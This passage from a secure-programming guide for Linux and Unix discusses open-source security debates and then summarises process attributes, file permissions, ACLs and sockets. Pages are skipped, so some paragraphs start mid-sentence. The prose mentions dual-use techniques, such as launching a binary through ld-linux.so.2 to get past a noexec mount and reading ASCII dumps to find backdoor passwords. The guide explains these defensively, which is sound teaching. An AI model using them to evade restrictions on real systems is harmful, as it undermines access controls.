Red Hat (an open source company), has developed a paper on why they believe open source is more
effective for security [TruSecure 2001]. Natalie Walker Whitlock’s IBM DeveloperWorks article
discusses the pros and cons as well. Brian Witten, Carl Landwehr, and Micahel Caloyannides [Witten
2001] published in IEEE Software an article tentatively concluding that having source code available
should work in the favor of system security; they note:
“We can draw four additional conclusions from this discussion. First, access to source code lets users improve
system security -- if they have the capability and resources to do so. Second, limited tests indicate that for some
cases, open source life cycles produce systems that are less vulnerable to nonmalicious faults. Third, a survey
of three operating systems indicates that one open source operating system experienced less exposure in the
form of known but unpatched vulnerabilities over a 12-month period than was experienced by either of two
proprietary counterparts. Last, closed and proprietary system development models face disincentives toward
fielding and supporting more secure systems as long as less secure systems are more profitable.
Notwithstanding these conclusions, arguments in this important matter are in their formative stages and in dire
need of metrics that can reflect security delivered to the customer.”
Scott A. Hissam and Daniel Plakosh’s “Trust and Vulnerability in Open Source Software” discuss the
pluses and minuses of open source software. As with other papers, they note that just because the
software is open to review, it should not automatically follow that such a review has actually been
performed. Indeed, they note that this is a general problem for all software, open or closed - it is often
questionable if many people examine any given piece of software. One interesting point is that they
demonstrate that attackers can learn about a vulnerability in a closed source program (Windows) from
patches made to an OSS/FS program (Linux). In this example, Linux developers fixed a vulnerability
before attackers tried to attack it, and attackers correctly surmised that a similar problem might be still be
in Windows (and it was). Unless OSS/FS programs are forbidden, this kind of learning is difficult to
prevent. Therefore, the existance of an OSS/FS program can reveal the vulnerabilities of both the
OSS/FS and proprietary program performing the same function - but at in this example, the OSS/FS
program was fixed first.
11
Chapter 2. Background
to find those problems; I’ll group the techniques into “dynamic” techniques (where you run the program)
and “static” techniques (where you examine the program’s code - be it source code or machine code).
In “dynamic” approaches, an attacker runs the program, sending it data (often problematic data), and
sees if the programs’ response indicates a common vulnerability. Open and closed programs have no
difference here, since the attacker isn’t looking at code.
Attackers may also look at the code, the “static” approach. For open source software, they’ll probably
look at the source code and search it for patterns. For closed source software, you can search the machine
code (usually presented in assembly language format to simplify the task) for patterns that suggest
security problems. In fact, there’s are several tools that do this. Attackers might also use tools called
“decompilers” that turn the machine code back into source code and then search the source code for the
vulnerable patterns (the same way they would search for vulnerabilities in source code in open source
software). See Flake [2001] for one discussion of how closed code can still be examined for security
vulnerabilities (e.g., using disassemblers). This point is important: even if an attacker wanted to use
source code to find a vulnerability, a closed source program has no advantage, because the attacker can
use a disassembler to re-create the source code of the product (for analysis), or use a binary scanning tool.
Non-developers might ask “if decompilers can create source code from machine code, then why do
developers say they need source code instead of just machine code?” The problem is that although
developers don’t need source code to find security problems, developers do need source code to make
substantial improvements to the program. Although decompilers can turn machine code back into a
“source code” of sorts, the resulting source code is extremely hard to modify. Typically most
understandable names are lost, so instead of variables like “grand_total” you get “x123123”, instead of
methods like “display_warning” you get “f123124”, and the code itself may have spatterings of assembly
in it. Also, _ALL_ comments and design information are lost. This isn’t a serious problem for finding
security problems, because generally you’re searching for patterns indicating vulnerabilities, not for
internal variable or method names. Thus, decompilers and binary code scanning tools can be useful for
finding ways to attack programs, or to see how vulnerable a program is, but aren’t helpful for updating
programs.
Thus, developers will say “source code is vital” when they intend to add functionality), but the fact that
the source code for closed source programs is hidden doesn’t protect the program very much. In fact,
users of binary-only programs can have a problem when they use decompilers or binary scanning tools;
it’s quite possible for a diligent user to know of a security flaw they can exploit but can’t easily fix, and
they many not be able to convince the vendor to fix it either.
And this assumes you can keep the source code secret from attackers anyway. For example, Microsoft
has had at least parts of its source code stolen several times, at least once from Microsoft itself and at
least once from another company it shared data with. Microsoft also has programs to share its source
code with various governments, companies, and educational settings; some of those organizations
include attackers, and those organizations could be attacked by others to acquire the source code. I use
this merely as an example; there are many reasons source code must be shared by many companies. And
this doesn’t even take into consideration that aggreved workers might maliciously release the source
code. Depending on long-term secrecy of source code is self-deception; you many delay its release, but if
it’s important, it will probably be stolen sooner or later. Keeping the source code secret makes financial
sense for proprietary vendors as a way to encourage customers to buy the products and support, but it is
not a strong security measure.
12
Chapter 2. Background
The comments of Microsoft’s Scott Culp, manager of the company’s security response center, echo a common
refrain in a long, ongoing battle over information. Discussions of morality regarding the distribution of
information go way back and are very familiar. Several centuries ago, for example, the church tried to squelch
Copernicus’ and Galileo’s theory of the sun being at the center of the solar system... Culp’s attempt to blame
"information security professionals" for the recent spate of vulnerabilities in Microsoft products is at best
disingenuous. Perhaps, it also represents an attempt to deflect criticism from the company that built those
products... [The] efforts of all parties contribute to a continuous process of improvement. The more widely
vulnerabilities become known, the more quickly they get fixed.
13
Chapter 2. Background
discouraging is that the backdoor can be easily found simply by looking at an ASCII dump of the
program (a common cracker trick). Once this problem was found by open source developers reviewing
the code, it was patched quickly. You could argue that, by keeping the password unknown, the program
stayed safe, and that opening the source made the program less secure. I think this is nonsense, since
ASCII dumps are trivial to do and well-known as a standard attack technique, and not all attackers have
sudden urges to announce vulnerabilities - in fact, there’s no way to be certain that this vulnerability has
not been exploited many times. It’s clear that after the source was opened, the source code was reviewed
over time, and the vulnerabilities found and fixed. One way to characterize this is to say that the original
code was vulnerable, its vulnerabilities became easier to exploit when it was first made open source, and
then finally these vulnerabilities were fixed.
• First, people have to actually review the code. This is one of the key points of debate - will people
really review code in an open source project? All sorts of factors can reduce the amount of review:
being a niche or rarely-used product (where there are few potential reviewers), having few developers,
and use of a rarely-used computer language. Clearly, a program that has a single developer and no
other contributors of any kind doesn’t have this kind of review. On the other hand, a program that has a
primary author and many other people who occasionally examine the code and contribute suggests
that there are others reviewing the code (at least to create contributions). In general, if there are more
reviewers, there’s generally a higher likelihood that someone will identify a flaw - this is the basis of
the “many eyeballs” theory. Note that, for example, the OpenBSD project continuously examines
programs for security flaws, so the components in its innermost parts have certainly undergone a
lengthy review. Since OSS/FS discussions are often held publicly, this level of review is something
that potential users can judge for themselves.
One factor that can particularly reduce review likelihood is not actually being open source. Some
vendors like to posture their “disclosed source” (also called “source available”) programs as being
open source, but since the program owner has extensive exclusive rights, others will have far less
incentive to work “for free” for the owner on the code. Even open source licenses which have
14
Chapter 2. Background
unusually asymmetric rights (such as the MPL) have this problem. After all, people are less likely to
voluntarily participate if someone else will have rights to their results that they don’t have (as Bruce
Perens says, “who wants to be someone else’s unpaid employee?”). In particular, since the reviewers
with the most incentive tend to be people trying to modify the program, this disincentive to participate
reduces the number of “eyeballs”. Elias Levy made this mistake in his article about open source
security; his examples of software that had been broken into (e.g., TIS’s Gauntlet) were not, at the
time, open source.
• Second, at least some of the people developing and reviewing the code must know how to write secure
programs. Hopefully the existence of this book will help. Clearly, it doesn’t matter if there are “many
eyeballs” if none of the eyeballs know what to look for. Note that it’s not necessary for everyone to
know how to write secure programs, as long as those who do know how are examining the code
changes.
• Third, once found, these problems need to be fixed quickly and their fixes distributed. Open source
systems tend to fix the problems quickly, but the distribution is not always smooth. For example, the
OpenBSD developers do an excellent job of reviewing code for security flaws - but they don’t always
report the identified problems back to the original developer. Thus, it’s quite possible for there to be a
fixed version in one system, but for the flaw to remain in another. I believe this problem is lessening
over time, since no one “downstream” likes to repeatedly fix the same problem. Of course, ensuring
that security patches are actually installed on end-user systems is a problem for both open source and
closed source software.
Another advantage of open source is that, if you find a problem, you can fix it immediately. This really
doesn’t have any counterpart in closed source.
In short, the effect on security of open source software is still a major debate in the security community,
though a large number of prominent experts believe that it has great potential to be more secure.
• Application programs used as viewers of remote data. Programs used as viewers (such as word
processors or file format viewers) are often asked to view data sent remotely by an untrusted user (this
request may be automatically invoked by a web browser). Clearly, the untrusted user’s input should
not be allowed to cause the application to run arbitrary programs. It’s usually unwise to support
initialization macros (run when the data is displayed); if you must, then you must create a secure
sandbox (a complex and error-prone task that almost never succeeds, which is why you shouldn’t
support macros in the first place). Be careful of issues such as buffer overflow, discussed in Chapter 6,
which might allow an untrusted user to force the viewer to run an arbitrary program.
• Application programs used by the administrator (root). Such programs shouldn’t trust information that
can be controlled by non-administrators.
• Local servers (also called daemons).
• Network-accessible servers (sometimes called network daemons).
15
Chapter 2. Background
• Web-based applications (including CGI scripts). These are a special case of network-accessible
servers, but they’re so common they deserve their own category. Such programs are invoked indirectly
via a web server, which filters out some attacks but nevertheless leaves many attacks that must be
withstood.
• Applets (i.e., programs downloaded to the client for automatic execution). This is something Java is
especially famous for, though other languages (such as Python) support mobile code as well. There are
several security viewpoints here; the implementer of the applet infrastructure on the client side has to
make sure that the only operations allowed are “safe” ones, and the writer of an applet has to deal with
the problem of hostile hosts (in other words, you can’t normally trust the client). There is some
research attempting to deal with running applets on hostile hosts, but frankly I’m skeptical of the value
of these approaches and this subject is exotic enough that I don’t cover it further here.
• setuid/setgid programs. These programs are invoked by a local user and, when executed, are
immediately granted the privileges of the program’s owner and/or owner’s group. In many ways these
are the hardest programs to secure, because so many of their inputs are under the control of the
untrusted user and some of those inputs are not obvious.
This book merges the issues of these different types of program into a single set. The disadvantage of this
approach is that some of the issues identified here don’t apply to all types of programs. In particular,
setuid/setgid programs have many surprising inputs and several of the guidelines here only apply to
them. However, things are not so clear-cut, because a particular program may cut across these boundaries
(e.g., a CGI script may be setuid or setgid, or be configured in a way that has the same effect), and some
programs are divided into several executables each of which can be considered a different “type” of
program. The advantage of considering all of these program types together is that we can consider all
issues without trying to apply an inappropriate category to a program. As will be seen, many of the
principles apply to all programs that need to be secured.
There is a slight bias in this book toward programs written in C, with some notes on other languages such
as C++, Perl, PHP, Python, Ada95, and Java. This is because C is the most common language for
implementing secure programs on Unix-like systems (other than CGI scripts, which tend to use
languages such as Perl, PHP, or Python). Also, most other languages’ implementations call the C library.
This is not to imply that C is somehow the “best” language for this purpose, and most of the principles
described here apply regardless of the programming language used.
16
Chapter 2. Background
• Much of this information was scattered about; placing the critical information in one organized
document makes it easier to use.
• Some of this information is not written for the programmer, but is written for an administrator or user.
• Much of the available information emphasizes portable constructs (constructs that work on all
Unix-like systems), and failed to discuss Linux at all. It’s often best to avoid Linux-unique abilities for
portability’s sake, but sometimes the Linux-unique abilities can really aid security. Even if non-Linux
portability is desired, you may want to support the Linux-unique abilities when running on Linux.
And, by emphasizing Linux, I can include references to information that is helpful to someone
targeting Linux that is not necessarily true for others.
17
Chapter 2. Background
usually accompany it. Wood [1985] has some useful but dated advice in its “Security for Programmers”
chapter. Bellovin [1994] includes useful guidelines and some specific examples, such as how to
restructure an ftpd implementation to be simpler and more secure. FreeBSD provides some guidelines
FreeBSD [1999] [Quintero 1999] is primarily concerned with GNOME programming guidelines, but it
includes a section on security considerations. [Venema 1996] provides a detailed discussion (with
examples) of some common errors when programming secure programs (widely-known or predictable
passwords, burning yourself with malicious data, secrets in user-accessible data, and depending on other
programs). [Sibert 1996] describes threats arising from malicious data. Michael Bacarella’s article The
Peon’s Guide To Secure System Development provides a nice short set of guidelines.
There are many documents giving security guidelines for programs using the Common Gateway Interface
(CGI) to interface with the web. These include Van Biesbrouck [1996], Gundavaram [unknown],
[Garfinkle 1997] Kim [1996], Phillips [1995], Stein [1999], [Peteanu 2000], and [Advosys 2000].
There are many documents specific to a language, which are further discussed in the language-specific
sections of this book. For example, the Perl distribution includes perlsec(1), which describes how to use
Perl more securely. The Secure Internet Programming site at http://www.cs.princeton.edu/sip is
interested in computer security issues in general, but focuses on mobile code systems such as Java,
ActiveX, and JavaScript; Ed Felten (one of its principles) co-wrote a book on securing Java ([McGraw
1999]) which is discussed in Section 10.6. Sun’s security code guidelines provide some guidelines
primarily for Java and C; it is available at http://java.sun.com/security/seccodeguide.html.
Yoder [1998] contains a collection of patterns to be used when dealing with application security. It’s not
really a specific set of guidelines, but a set of commonly-used patterns for programming that you may
find useful. The Schmoo group maintains a web page linking to information on how to write secure code
at http://www.shmoo.com/securecode.
There are many documents describing the issue from the other direction (i.e., “how to crack a system”).
One example is McClure [1999], and there’s countless amounts of material from that vantage point on
the Internet. There are also more general documents on computer architectures on how attacks must be
developed to exploit them, e.g., [LSD 2001]. The Honeynet Project has been collecting information
(including statistics) on how attackers actually perform their attacks; see their website at
http://project.honeynet.org for more information. Insecure Programming by example provides a set of
insecure programs, intended for use as exercises to practice attacking insecure programs.
There’s also a large body of information on vulnerabilities already identified in existing programs. This
can be a useful set of examples of “what not to do,” though it takes effort to extract more general
guidelines from the large body of specific examples. There are mailing lists that discuss security issues;
one of the most well-known is Bugtraq, which among other things develops a list of vulnerabilities. The
CERT Coordination Center (CERT/CC) is a major reporting center for Internet security problems which
reports on vulnerabilities. The CERT/CC occasionally produces advisories that provide a description of a
serious security problem and its impact, along with instructions on how to obtain a patch or details of a
workaround; for more information see http://www.cert.org. Note that originally the CERT was a small
computer emergency response team, but officially “CERT” doesn’t stand for anything now. The
Department of Energy’s Computer Incident Advisory Capability (CIAC) also reports on vulnerabilities.
These different groups may identify the same vulnerabilities but use different names. To resolve this
problem, MITRE supports the Common Vulnerabilities and Exposures (CVE) list which creates a single
unique identifier (“name”) for all publicly known vulnerabilities and security exposures identified by
others; see http://www.cve.mitre.org. NIST’s ICAT is a searchable catalog of computer vulnerabilities,
categorizing each CVE vulnerability so that they can be searched and compared later; see
http://csrc.nist.gov/icat.
18
Chapter 2. Background
This book is a summary of what I believe are the most useful and important guidelines. My goal is a
book that a good programmer can just read and then be fairly well prepared to implement a secure
program. No single document can really meet this goal, but I believe the attempt is worthwhile. My
objective is to strike a balance somewhere between a “complete list of all possible guidelines” (that
would be unending and unreadable) and the various “short” lists available on-line that are nice and short
but omit a large number of critical issues. When in doubt, I include the guidance; I believe in that case
it’s better to make the information available to everyone in this “one stop shop” document. The
organization presented here is my own (every list has its own, different structure), and some of the
guidelines (especially the Linux-unique ones, such as those on capabilities and the FSUID value) are also
my own. Reading all of the referenced documents listed above as well is highly recommended, though I
realize that for many it’s impractical.
• Securityfocus.com has a wealth of general security-related news and information, and hosts a number
of security-related mailing lists. See their website for information on how to subscribe and view their
archives. A few of the most relevant mailing lists on SecurityFocus are:
• The “Bugtraq” mailing list is, as noted above, a “full disclosure moderated mailing list for the
detailed discussion and announcement of computer security vulnerabilities: what they are, how to
exploit them, and how to fix them.”
• The “secprog” mailing list is a moderated mailing list for the discussion of secure software
development methodologies and techniques. I specifically monitor this list, and I coordinate with its
moderator to ensure that resolutions reached in SECPROG (if I agree with them) are incorporated
into this document.
• The “vuln-dev” mailing list discusses potential or undeveloped holes.
• IBM’s “developerWorks: Security” has a library of interesting articles. You can learn more from
http://www.ibm.com/developer/security.
• For Linux-specific security information, a good source is LinuxSecurity.com. If you’re interested in
auditing Linux code, places to see include the Linux Security-Audit Project FAQ and Linux Kernel
Auditing Project are dedicated to auditing Linux code for security issues.
Of course, if you’re securing specific systems, you should sign up to their security mailing lists (e.g.,
Microsoft’s, Red Hat’s, etc.) so you can be warned of any security updates.
19
Chapter 2. Background
of the manual. The pointer value that means “does not point anywhere” is called NULL; C compilers
will convert the integer 0 to the value NULL in most circumstances where a pointer is needed, but note
that nothing in the C standard requires that NULL actually be implemented by a series of all-zero bits. C
and C++ treat the character “\0” (ASCII 0) specially, and this value is referred to as NIL in this book
(this is usually called “NUL”, but “NUL” and “NULL” sound identical). Function and method names
always use the correct case, even if that means that some sentences must begin with a lower case letter. I
use the term “Unix-like” to mean Unix, Linux, or other systems whose underlying models are very
similar to Unix; I can’t say POSIX, because there are systems such as Windows 2000 that implement
portions of POSIX yet have vastly different security models.
An attacker is called an “attacker”, “cracker”, or “adversary”, and not a “hacker”. Some journalists
mistakenly use the word “hacker” instead of “attacker”; this book avoids this misuse, because many
Linux and Unix developers refer to themselves as “hackers” in the traditional non-evil sense of the term.
To many Linux and Unix developers, the term “hacker” continues to mean simply an expert or enthusiast,
particularly regarding computers. It is true that some hackers commit malicious or intrusive actions, but
many other hackers do not, and it’s unfair to claim that all hackers perform malicious activities. Many
other glossaries and books note that not all hackers are attackers. For example, the Industry Advisory
Council’s Information Assurance (IA) Special Interest Group (SIG)’s Information Assurance Glossary
defines hacker as “A person who delights in having an intimate understanding of the internal workings of
computers and computer networks. The term is misused in a negative context where ‘cracker’ should be
used.” The Jargon File has a long and complicate definition for hacker, starting with “A person who
enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to
most users, who prefer to learn only the minimum necessary.”; it notes although some people use the
term to mean “A malicious meddler who tries to discover sensitive information by poking around”, it
also states that this definition is deprecated and that the correct term for this sense is “cracker” instead.
This book uses the logical quotation system, not the misleading typesetters’ quotation system. This
means that quoted information does not include any trailing punctuation if the punctuation is not part of
the material being quoted. The typesetters’ quotation system causes extraneous characters to be placed
inside the quotes; this has no affect in poetry but is a serious problem when accuracy is important. The
typesetters’ quotation system often falsifies quotes (since it includes punctuation not in the quote) and
can be disastrously erroneous in code or computer commands. The logical quotation system is widely
used in a variety of publications, including The Jargon File, Wikipedia, and the Linguistic Society of
America. This book uses standard American (not British) spelling.
20
Chapter 3. Summary of Linux and Unix Security
Features
Discretion will protect you, and
understanding will guard you.
Proverbs 2:11 (NIV)
Before discussing guidelines on how to use Linux or Unix security features, it’s useful to know what
those features are from a programmer’s viewpoint. This section briefly describes those features that are
widely available on nearly all Unix-like systems. However, note that there is considerable variation
between different versions of Unix-like systems, and not all systems have the abilities described here.
This chapter also notes some extensions or features specific to Linux; Linux distributions tend to be
fairly similar to each other from the point-of-view of programming for security, because they all use
essentially the same kernel and C library (and the GPL-based licenses encourage rapid dissemination of
any innovations). It also notes some of the security-relevant differences between different Unix
implementations, but please note that this isn’t an exhaustive list. This chapter doesn’t discuss issues
such as implementations of mandatory access control (MAC) which many Unix-like systems do not
implement. If you already know what those features are, please feel free to skip this section.
Many programming guides skim briefly over the security-relevant portions of Linux or Unix and skip
important information. In particular, they often discuss “how to use” something in general terms but
gloss over the security attributes that affect their use. Conversely, there’s a great deal of detailed
information in the manual pages about individual functions, but the manual pages sometimes obscure
key security issues with detailed discussions on how to use each individual function. This section tries to
bridge that gap; it gives an overview of the security mechanisms in Linux that are likely to be used by a
programmer, but concentrating specifically on the security ramifications. This section has more depth
than the typical programming guides, focusing specifically on security-related matters, and points to
references where you can get more details.
First, the basics. Linux and Unix are fundamentally divided into two parts: the kernel and “user space”.
Most programs execute in user space (on top of the kernel). Linux supports the concept of “kernel
modules”, which is simply the ability to dynamically load code into the kernel, but note that it still has
this fundamental division. Some other systems (such as the HURD) are “microkernel” based systems;
they have a small kernel with more limited functionality, and a set of “user” programs that implement the
lower-level functions traditionally implemented by the kernel.
Some Unix-like systems have been extensively modified to support strong security, in particular to
support U.S. Department of Defense requirements for Mandatory Access Control (level B1 or higher).
This version of this book doesn’t cover these systems or issues; I hope to expand to that in a future
version. More detailed information on some of them is available elsewhere, for example, details on SGI’s
“Trusted IRIX/B” are available in NSA’s Final Evaluation Reports (FERs).
When users log in, their usernames are mapped to integers marking their “UID” (for “user id”) and the
“GID”s (for “group id”) that they are a member of. UID 0 is a special privileged user (role) traditionally
called “root”; on most Unix-like systems (including the normal Linux kernel) root can overrule most
security checks and is used to administrate the system. On some Unix systems, GID 0 is also special and
permits unrestricted access normal to resources at the group level [Gay 2000, 228]; this isn’t true on
other systems (such as Linux), but even in those systems group 0 is essentially all-powerful because so
21
Chapter 3. Summary of Linux and Unix Security Features
many special system files are owned by group 0. Processes are the only “subjects” in terms of security
(that is, only processes are active objects). Processes can access various data objects, in particular
filesystem objects (FSOs), System V Interprocess Communication (IPC) objects, and network ports.
Processes can also set signals. Other security-relevant topics include quotas and limits, libraries,
auditing, and PAM. The next few subsections detail this.
3.1. Processes
In Unix-like systems, user-level activities are implemented by running processes. Most Unix systems
support a “thread” as a separate concept; threads share memory inside a process, and the system
scheduler actually schedules threads. Linux does this differently (and in my opinion uses a better
approach): there is no essential difference between a thread and a process. Instead, in Linux, when a
process creates another process it can choose what resources are shared (e.g., memory can be shared).
The Linux kernel then performs optimizations to get thread-level speeds; see clone(2) for more
information. It’s worth noting that the Linux kernel developers tend to use the word “task”, not “thread”
or “process”, but the external documentation tends to use the word process (so I’ll use the term “process”
here). When programming a multi-threaded application, it’s usually better to use one of the standard
thread libraries that hide these differences. Not only does this make threading more portable, but some
libraries provide an additional level of indirection, by implementing more than one application-level
thread as a single operating system thread; this can provide some improved performance on some
systems for some applications.
• RUID, RGID - real UID and GID of the user on whose behalf the process is running
• EUID, EGID - effective UID and GID used for privilege checks (except for the filesystem)
• SUID, SGID - Saved UID and GID; used to support switching permissions “on and off” as discussed
below. Not all Unix-like systems support this, but the vast majority do (including Linux and Solaris);
if you want to check if a given system implements this option in the POSIX standard, you can use
sysconf(2) to determine if _POSIX_SAVED_IDS is in effect.
• supplemental groups - a list of groups (GIDs) in which this user has membership. In the original
version 7 Unix, this didn’t exist - processes were only a member of one group at a time, and a special
command had to be executed to change that group. BSD added support for a list of groups in each
process, which is more flexible, and this addition is now widely implemented (including by Linux and
Solaris).
• umask - a set of bits determining the default access control settings when a new filesystem object is
created; see umask(2).
• scheduling parameters - each process has a scheduling policy, and those with the default policy
SCHED_OTHER have the additional parameters nice, priority, and counter. See sched_setscheduler(2)
for more information.
• limits - per-process resource limits (see below).
22
Chapter 3. Summary of Linux and Unix Security Features
• filesystem root - the process’ idea of where the root filesystem (“/”) begins; see chroot(2).
• FSUID, FSGID - UID and GID used for filesystem access checks; this is usually equal to the EUID
and EGID respectively. This is a Linux-unique attribute.
• capabilities - POSIX capability information; there are actually three sets of capabilities on a process:
the effective, inheritable, and permitted capabilities. See below for more information on POSIX
capabilities. Linux kernel version 2.2 and greater support this; some other Unix-like systems do too,
but it’s not as widespread.
In Linux, if you really need to know exactly what attributes are associated with each process, the most
definitive source is the Linux source code, in particular /usr/include/linux/sched.h’s definition of
task_struct.
The portable way to create new processes it use the fork(2) call. BSD introduced a variant called vfork(2)
as an optimization technique. The bottom line with vfork(2) is simple: don’t use it if you can avoid it.
See Section 8.6 for more information.
Linux supports the Linux-unique clone(2) call. This call works like fork(2), but allows specification of
which resources should be shared (e.g., memory, file descriptors, etc.). Various BSD systems implement
an rfork() system call (originally developed in Plan9); it has different semantics but the same general
idea (it also creates a process with tighter control over what is shared). Portable programs shouldn’t use
these calls directly, if possible; as noted earlier, they should instead rely on threading libraries that use
such calls to implement threads.
This book is not a full tutorial on writing programs, so I will skip widely-available information handling
processes. You can see the documentation for wait(2), exit(2), and so on for more information.
23
Chapter 3. Summary of Linux and Unix Security Features
3.2. Files
On all Unix-like systems, the primary repository of information is the file tree, rooted at “/”. The file tree
is a hierarchical set of directories, each of which may contain filesystem objects (FSOs).
In Linux, filesystem objects (FSOs) may be ordinary files, directories, symbolic links, named pipes (also
called first-in first-outs or FIFOs), sockets (see below), character special (device) files, or block special
(device) files (in Linux, this list is given in the find(1) command). Other Unix-like systems have an
identical or similar list of FSO types.
24
Chapter 3. Summary of Linux and Unix Security Features
Filesystem objects are collected on filesystems, which can be mounted and unmounted on directories in
the file tree. A filesystem type (e.g., ext2 and FAT) is a specific set of conventions for arranging data on
the disk to optimize speed, reliability, and so on; many people use the term “filesystem” as a synonym for
the filesystem type.
• owning UID and GID - identifies the “owner” of the filesystem object. Only the owner or root can
change the access control attributes unless otherwise noted.
• permission bits - read, write, execute bits for each of user (owner), group, and other. For ordinary files,
read, write, and execute have their typical meanings. In directories, the “read” permission is necessary
to display a directory’s contents, while the “execute” permission is sometimes called “search”
permission and is necessary to actually enter the directory to use its contents. In a directory “write”
permission on a directory permits adding, removing, and renaming files in that directory; if you only
want to permit adding, set the sticky bit noted below. Note that the permission values of symbolic links
are never used; it’s only the values of their containing directories and the linked-to file that matter.
• “sticky” bit - when set on a directory, unlinks (removes) and renames of files in that directory are
limited to the file owner, the directory owner, or root privileges. This is a very common Unix extension
and is specified in the Open Group’s Single Unix Specification version 2. Old versions of Unix called
this the “save program text” bit and used this to indicate executable files that should stay in memory.
Systems that did this ensured that only root could set this bit (otherwise users could have crashed
systems by forcing “everything” into memory). In Linux, this bit has no effect on ordinary files and
ordinary users can modify this bit on the files they own: Linux’s virtual memory management makes
this old use irrelevant.
• setuid, setgid - when set on an executable file, executing the file will set the process’ effective UID or
effective GID to the value of the file’s owning UID or GID (respectively). All Unix-like systems
support this. In Linux and System V systems, when setgid is set on a file that does not have any
execute privileges, this indicates a file that is subject to mandatory locking during access (if the
filesystem is mounted to support mandatory locking); this overload of meaning surprises many and is
not universal across Unix-like systems. In fact, the Open Group’s Single Unix Specification version 2
for chmod(3) permits systems to ignore requests to turn on setgid for files that aren’t executable if
such a setting has no meaning. In Linux and Solaris, when setgid is set on a directory, files created in
the directory will have their GID automatically reset to that of the directory’s GID. The purpose of this
approach is to support “project directories”: users can save files into such specially-set directories and
the group owner automatically changes. However, setting the setgid bit on directories is not specified
by standards such as the Single Unix Specification [Open Group 1997].
• timestamps - access and modification times are stored for each filesystem object. However, the owner
is allowed to set these values arbitrarily (see touch(1)), so be careful about trusting this information.
All Unix-like systems support this.
25
Chapter 3. Summary of Linux and Unix Security Features
The following attributes are Linux-unique extensions on the ext2 filesystem, though many other
filesystems have similar functionality:
• immutable bit - no changes to the filesystem object are allowed; only root can set or clear this bit. This
is only supported by ext2 and is not portable across all Unix systems (or even all Linux filesystems).
• append-only bit - only appending to the filesystem object are allowed; only root can set or clear this
bit. This is only supported by ext2 and is not portable across all Unix systems (or even all Linux
filesystems).
Other common extensions include some sort of bit indicating “cannot delete this file”.
Some Unix-like systems also support extended attributes (known as in the Macintosh world as “resource
forks”), which are essentially name/value pairs associated with files or directories but not stored inside
the data of the file or directory itself. Extended attributes can store more detailed access control
information, a MIME type, and so on. Linux kernel 2.6 adds this capability, but since many systems and
filesystems don’t support it, many programs choose not to use them.
Some Unix-like systems support POSIX access control lists (ACLs), which allow users to specify in
more detail who specifically can access a file and how. See Section 3.2.2 for more information.
Many of these values can be influenced at mount time, so that, for example, certain bits can be treated as
though they had a certain value (regardless of their values on the media). See mount(1) for more
information about this. These bits are useful, but be aware that some of these are intended to simplify
ease-of-use and aren’t really sufficient to prevent certain actions. For example, on Linux, mounting with
“noexec” will disable execution of programs on that file system; as noted in the manual, it’s intended for
mounting filesystems containing binaries for incompatible systems. On Linux, this option won’t
completely prevent someone from running the files; they can copy the files somewhere else to run them,
or even use the command “/lib/ld-linux.so.2” to run the file directly.
Some filesystems don’t support some of these access control values; again, see mount(1) for how these
filesystems are handled. In particular, many Unix-like systems support MS-DOS disks, which by default
support very few of these attributes (and there’s not standard way to define these attributes). In that case,
Unix-like systems emulate the standard attributes (possibly implementing them through special on-disk
files), and these attributes are generally influenced by the mount(1) command.
It’s important to note that, for adding and removing files, only the permission bits and owner of the file’s
directory really matter unless the Unix-like system supports more complex schemes (such as POSIX
ACLs). Unless the system has other extensions, and stock Linux 2.2 and 2.4 do not, a file that has no
permissions in its permission bits can still be removed if its containing directory permits it (exception:
directories marked as "sticky" have special rules). Also, if an ancestor directory permits its children to be
changed by some user or group, then any of that directory’s descendants can be replaced by that user or
group.
It’s worth noting that in Linux, the Linux ext2 filesystem by default reserves a small amount of space for
the root user. This is a partial defense against denial-of-service attacks; even if a user fills a disk that is
shared with the root user, the root user has a little space left over (e.g., for critical functions). The default
is 5% of the filesystem space; see mke2fs(8), in particular its “-m” option.
26
Chapter 3. Summary of Linux and Unix Security Features
27
Chapter 3. Summary of Linux and Unix Security Features
can access the FSO; every directory can also have a set of default ACL entries used when an FSO is
created inside it. Each ACL entry can be one of a number of different types, and each entry also what
accesses are granted (r for read, w for write, x for execute). Unfortunately, the POSIX draft names for
these ACL entry types are really ugly; it’s actually a simple system, complicated by bad names. There
are "short form" and "long form" ways of displaying and setting this information.
Here are their official names, with an explanation, and the short and long form:
The "mask" is the gimmick that makes these extended POSIX ACLs work well with programs not
designed to work with them. If you specify any specific users or groups other than the owner or group
owner (i.e., you use ACL_USER or ACL_GROUP), then you atuomaticaly have to have a mask entry.
For more information on POSIX ACLs, see acl(5).
28
Chapter 3. Summary of Linux and Unix Security Features
new subdirectory will also have its setgid bit set (so that project subdirectories will “do the right thing”.);
in all other cases the setgid is clear for a new file. This is the rationale for the “user-private group”
scheme (used by Red Hat Linux and some others). In this scheme, every user is a member of a “private”
group with just themselves as members, so their defaults can permit the group to read and write any file
(since they’re the only member of the group). Thus, when the file’s group membership is transferred this
way, read and write privileges are transferred too. FSO basic access control values (read, write, execute)
are computed from (requested values & ~ umask of process). New files always start with a clear sticky
bit and clear setuid bit. For more information on POSIX ACLs, see acl(5).
29
Chapter 3. Summary of Linux and Unix Security Features
• read and write permissions for each of creator, creator group, and others.
• creator UID and GID - UID and GID of the creator of the object.
• owning UID and GID - UID and GID of the owner of the object (initially equal to the creator UID).
Note that root, or a process with the EUID of either the owner or creator, can set the owning UID and
owning GID and/or remove the object. More information is available in ipc(5).
30
Chapter 3. Summary of Linux and Unix Security Features
they are fairly similar to named pipes, but with significant advantages. In particular, Unix domain socket
is connection-oriented; each new connection to the socket results in a new communication channel, a
very different situation than with named pipes. Because of this property, Unix domain sockets are often
used instead of named pipes to implement IPC for many important services. Just like you can have
unnamed pipes, you can have unnamed Unix domain sockets using socketpair(2); unnamed Unix domain
sockets are useful for IPC in a way similar to unnamed pipes.
There are several interesting security implications of Unix domain sockets. First, although Unix domain
sockets can appear in the filesystem and can have stat(2) applied to them, you can’t use open(2) to open
them (you have to use the socket(2) and friends interface). Second, Unix domain sockets can be used to
pass file descriptors between processes (not just the file’s contents). This odd capability, not available in
any other IPC mechanism, has been used to hack all sorts of schemes (the descriptors can basically be
used as a limited version of the “capability” in the computer science sense of the term). File descriptors
are sent using sendmsg(2), where the msg (message)’s field msg_control points to an array of control
message headers (field msg_controllen must specify the number of bytes contained in the array). Each
